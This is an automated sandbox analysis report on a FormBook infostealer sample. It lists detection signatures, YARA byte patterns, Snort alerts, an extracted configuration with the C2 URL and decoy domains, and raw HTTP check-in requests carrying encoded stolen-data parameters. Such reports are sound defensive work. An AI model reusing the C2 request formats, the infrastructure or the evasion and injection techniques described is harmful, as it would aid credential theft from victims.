Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report UGGJ4NnzFz

Overview

General Information

Sample Name:UGGJ4NnzFz (renamed file extension from none to exe)
Analysis ID:432566
MD5:b148ae414eb8a1b34a15cdb32c21f9ee
SHA1:25b78f76010cc34843352c78d4f8e07a28b46b32
SHA256:193788545c12c697fe660e9dd178e5d97478d5b90d5b0096f1cd6a9b641d48e9
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • UGGJ4NnzFz.exe (PID: 4884 cmdline: 'C:\Users\user\Desktop\UGGJ4NnzFz.exe' MD5: B148AE414EB8A1B34A15CDB32C21F9EE)
    • UGGJ4NnzFz.exe (PID: 5520 cmdline: 'C:\Users\user\Desktop\UGGJ4NnzFz.exe' MD5: B148AE414EB8A1B34A15CDB32C21F9EE)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmmon32.exe (PID: 6512 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
          • cmd.exe (PID: 6668 cmdline: /c del 'C:\Users\user\Desktop\UGGJ4NnzFz.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.rebeccannemontgomery.net/dp3a/"], "decoy": ["frayl.com", "utmostroofing.com", "galactigames.com", "kingguardgroup.com", "goldinsacks.com", "platinumcreditrepair.net", "sw-advisers.com", "ininjawebtech.com", "spectrurnvisionpartners.com", "freshdeliciousberryfarm.com", "12796.xyz", "goldgrandpa.com", "chicago-trading.academy", "newstechealth.com", "pecon.pro", "2dmaxximumrecords.com", "athrivingthirtysomething.com", "universalphonemarket.com", "motivationinterviewsinc.com", "virtualrealty.tours", "bring-wellness.com", "fengshuimingshi.com", "urbanpite.com", "28ji.site", "xuanpei.net", "letstrumpbiden.com", "xtremetechtv.com", "leyardzm.net", "funemoke.net", "closetofaurora.com", "theyogirunner.com", "pmbcommercial.com", "michiganpsychologist.com", "foodandbio.com", "goodlukc.com", "kingofkingslovesyou.com", "topazsnacks.com", "vinpearlnhatrangbay.com", "24x7dream.com", "attafine.com", "hireinone.xyz", "growwithjenn.com", "fortworthsurrogacy.com", "kladios.com", "aishark.net", "havenparent.com", "elementaryelegance.com", "moulardfarms.net", "tomrings.com", "allyexpense.com", "juleshypnosis.com", "rboxtogo.com", "restorey.com", "oilleakgames.com", "protectpursuit.com", "checkitreviews.com", "jeremypohu.com", "mnanoramaonline.com", "xn--instagrm-fza.com", "fianser.com", "www-338616.com", "woollardhenry.com", "reviewdrkofford.com", "vandalvans.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.1.UGGJ4NnzFz.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.1.UGGJ4NnzFz.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.1.UGGJ4NnzFz.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        1.1.UGGJ4NnzFz.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.1.UGGJ4NnzFz.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.rebeccannemontgomery.net/dp3a/"], "decoy": ["frayl.com", "utmostroofing.com", "galactigames.com", "kingguardgroup.com", "goldinsacks.com", "platinumcreditrepair.net", "sw-advisers.com", "ininjawebtech.com", "spectrurnvisionpartners.com", "freshdeliciousberryfarm.com", "12796.xyz", "goldgrandpa.com", "chicago-trading.academy", "newstechealth.com", "pecon.pro", "2dmaxximumrecords.com", "athrivingthirtysomething.com", "universalphonemarket.com", "motivationinterviewsinc.com", "virtualrealty.tours", "bring-wellness.com", "fengshuimingshi.com", "urbanpite.com", "28ji.site", "xuanpei.net", "letstrumpbiden.com", "xtremetechtv.com", "leyardzm.net", "funemoke.net", "closetofaurora.com", "theyogirunner.com", "pmbcommercial.com", "michiganpsychologist.com", "foodandbio.com", "goodlukc.com", "kingofkingslovesyou.com", "topazsnacks.com", "vinpearlnhatrangbay.com", "24x7dream.com", "attafine.com", "hireinone.xyz", "growwithjenn.com", "fortworthsurrogacy.com", "kladios.com", "aishark.net", "havenparent.com", "elementaryelegance.com", "moulardfarms.net", "tomrings.com", "allyexpense.com", "juleshypnosis.com", "rboxtogo.com", "restorey.com", "oilleakgames.com", "protectpursuit.com", "checkitreviews.com", "jeremypohu.com", "mnanoramaonline.com", "xn--instagrm-fza.com", "fianser.com", "www-338616.com", "woollardhenry.com", "reviewdrkofford.com", "vandalvans.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: UGGJ4NnzFz.exeVirustotal: Detection: 29%Perma Link
          Source: UGGJ4NnzFz.exeReversingLabs: Detection: 29%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.477114884.00000000041D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.274258003.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.477190198.0000000004210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.274280539.00000000008E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.220100225.0000000002290000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.UGGJ4NnzFz.exe.2290000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.UGGJ4NnzFz.exe.2290000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: UGGJ4NnzFz.exeJoe Sandbox ML: detected
          Source: 1.1.UGGJ4NnzFz.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.UGGJ4NnzFz.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.2.cmmon32.exe.624368.0.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 9.2.cmmon32.exe.4a87960.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.2.UGGJ4NnzFz.exe.2290000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: UGGJ4NnzFz.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: cmmon32.pdb source: UGGJ4NnzFz.exe, 00000001.00000002.274327095.0000000000930000.00000040.00000001.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: UGGJ4NnzFz.exe, 00000001.00000002.274327095.0000000000930000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: UGGJ4NnzFz.exe, 00000000.00000003.212550994.0000000009A50000.00000004.00000001.sdmp, UGGJ4NnzFz.exe, 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, cmmon32.exe, 00000009.00000002.477934562.000000000466F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: UGGJ4NnzFz.exe, cmmon32.exe
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_0040263E FindFirstFileA,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile opened: C:\Users\user
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile opened: C:\Users\user\Desktop\UGGJ4NnzFz.exe
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile opened: C:\Users\user\AppData\Local\Temp\nsyA3E3.tmp
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile opened: C:\Users\user\Desktop\desktop.ini
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile opened: C:\Users\user\AppData\Local\Temp\dceotuvjnitpz
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeFile opened: C:\Users\user\AppData\Local\Temp\6jlp0t221b5inmotwb6
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 4x nop then pop esi
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop ebx

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49741 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49741 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49741 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49743 -> 157.245.232.77:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49743 -> 157.245.232.77:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49743 -> 157.245.232.77:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49744 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49744 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49744 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 62.149.128.40:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 62.149.128.40:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 62.149.128.40:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.rebeccannemontgomery.net/dp3a/
          Source: global trafficHTTP traffic detected: GET /dp3a/?rTWxa=fFin23A3InOxv8Q1OZSqiWR/FjS3KuFpXPcC+roY+PuFOGx4uYNLJpybUr51Ny74Rks0&qXtd=VpFTeL6xRNZ0stZ0 HTTP/1.1Host: www.protectpursuit.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=DH0B3lUhAa5VBPw8nCCOXpLU24maY23yGmrt22qj0kvQjGAaKYYXdT0Mh/TRCK5k4cmX HTTP/1.1Host: www.freshdeliciousberryfarm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?rTWxa=76AMkVxxuSKB5pgh4RNc3EipO3rbFW8MEUNJys/eLa/AxdTMjRac1XeBowoP/wZORJRk&qXtd=VpFTeL6xRNZ0stZ0 HTTP/1.1Host: www.sw-advisers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=GkWHDDYMiWr4Ju0U4teKyAR8hKcpKlGmV2ZHyKwA/bXhSAEvQCtqjiLuXtjyxk2BGjrR HTTP/1.1Host: www.goldgrandpa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=2EHAYBF9OrZScLBFfnY/kB1lNYuVodkTQi7ynUSvkYXlrnDKiUoE/Bv6J35YIy7pKLvP HTTP/1.1Host: www.goldinsacks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=WU2tAheQ8tcf93YEudKDnPgih3iSbxP+RxOmhUzH4Gc7ohEPLFzZpUy5aqQrTWYg/sJi HTTP/1.1Host: www.growwithjenn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?rTWxa=F+NQG3wr2qmzRibT9BAJK2aVObQEDzb5Y6jfukgEe6sv7RNklleEIbtQ/MsGh07J4TVQ&qXtd=VpFTeL6xRNZ0stZ0 HTTP/1.1Host: www.bring-wellness.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 62.149.128.40 62.149.128.40
          Source: Joe Sandbox ViewIP Address: 160.153.136.3 160.153.136.3
          Source: Joe Sandbox ViewASN Name: ARUBA-ASNIT ARUBA-ASNIT
          Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
          Source: Joe Sandbox ViewASN Name: GODADDY-AMSDE GODADDY-AMSDE
          Source: global trafficHTTP traffic detected: GET /dp3a/?rTWxa=fFin23A3InOxv8Q1OZSqiWR/FjS3KuFpXPcC+roY+PuFOGx4uYNLJpybUr51Ny74Rks0&qXtd=VpFTeL6xRNZ0stZ0 HTTP/1.1Host: www.protectpursuit.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=DH0B3lUhAa5VBPw8nCCOXpLU24maY23yGmrt22qj0kvQjGAaKYYXdT0Mh/TRCK5k4cmX HTTP/1.1Host: www.freshdeliciousberryfarm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?rTWxa=76AMkVxxuSKB5pgh4RNc3EipO3rbFW8MEUNJys/eLa/AxdTMjRac1XeBowoP/wZORJRk&qXtd=VpFTeL6xRNZ0stZ0 HTTP/1.1Host: www.sw-advisers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=GkWHDDYMiWr4Ju0U4teKyAR8hKcpKlGmV2ZHyKwA/bXhSAEvQCtqjiLuXtjyxk2BGjrR HTTP/1.1Host: www.goldgrandpa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=2EHAYBF9OrZScLBFfnY/kB1lNYuVodkTQi7ynUSvkYXlrnDKiUoE/Bv6J35YIy7pKLvP HTTP/1.1Host: www.goldinsacks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=WU2tAheQ8tcf93YEudKDnPgih3iSbxP+RxOmhUzH4Gc7ohEPLFzZpUy5aqQrTWYg/sJi HTTP/1.1Host: www.growwithjenn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dp3a/?rTWxa=F+NQG3wr2qmzRibT9BAJK2aVObQEDzb5Y6jfukgEe6sv7RNklleEIbtQ/MsGh07J4TVQ&qXtd=VpFTeL6xRNZ0stZ0 HTTP/1.1Host: www.bring-wellness.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.allyexpense.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 10 Jun 2021 12:36:41 GMTContent-Length: 0Connection: closeVary: Origin
          Source: explorer.exe, 00000005.00000000.243022524.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: UGGJ4NnzFz.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: UGGJ4NnzFz.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: cmmon32.exe, 00000009.00000002.479471132.0000000004C02000.00000004.00000001.sdmpString found in binary or memory: http://www.goldinsacks.com:80/dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=2EHAYBF9OrZScLBFfnY/kB1lNYuVodkT
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,
          Source: UGGJ4NnzFz.exe, 00000000.00000002.219983630.00000000006FA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.477114884.00000000041D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.274258003.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.477190198.0000000004210000.00000004.00000001.sdmp, type: MEMORY
